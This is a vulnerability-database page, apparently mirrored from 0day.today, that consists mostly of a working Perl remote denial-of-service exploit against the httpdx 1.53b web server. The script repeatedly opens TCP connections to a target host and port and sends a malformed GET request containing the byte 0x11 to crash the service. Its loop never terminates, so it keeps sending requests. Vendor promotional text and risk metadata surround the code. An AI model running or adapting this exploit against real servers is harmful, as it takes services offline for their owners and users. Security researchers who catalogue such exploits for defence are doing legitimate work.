Lucene search

K

httpdx1.53b (sockets++ crash) Remote Denial of Service Exploit

🗓️ 23 Feb 2010 00:00:00Reported by d3b4gType 
zdt
 zdt
🔗 0day.today👁 19 Views

httpdx1.53b sockets++ crash Remote Denial of Service exploi

Show more
Code
==============================================================
httpdx1.53b (sockets++ crash) Remote Denial of Service Exploit
==============================================================

#!/usr/bin/perl
#
# Exploit Title: httpdx1.53b (sockets++ crash) Remote Denial of Service exploit
# Date: 22.02.2010
# Author: d3b4g
# Software Link: http://httpdx.sourceforge.net/downloads/
# Version: 1.53b
# Tested on: windows xpsp3 vmware

# I'm from tiny little island's of maldivies
#
# The vulnerability is caused due to an error in multi-socket.
# This can be exploited to crash the HTTP service.


use IO::Socket;
print "[+] Author : d3b4g\n";
print "[+] Soft   : httpdx1.53b Remote DoS\n";

	if (@ARGV < 1)
		{
 		print "[-] Usage: <file.pl> <host> <port>\n";
 		print "[-] Exemple: file.pl 192.168.2.1 80\n";
 		exit;
		}


	$ip 	= $ARGV[0];
	$port 	= $ARGV[1];

print "[+] Sending request...\n";

for($i=0;$i=4;$i++)
{
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ip", PeerPort => "$port") || die "[-]Done!\n";

	print $socket "GET \x11 HTTP/1.0\n\r\n";
}




#  0day.today [2018-03-14]  #

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
23 Feb 2010 00:00Current
7High risk
Vulners AI Score7
19
.json
Report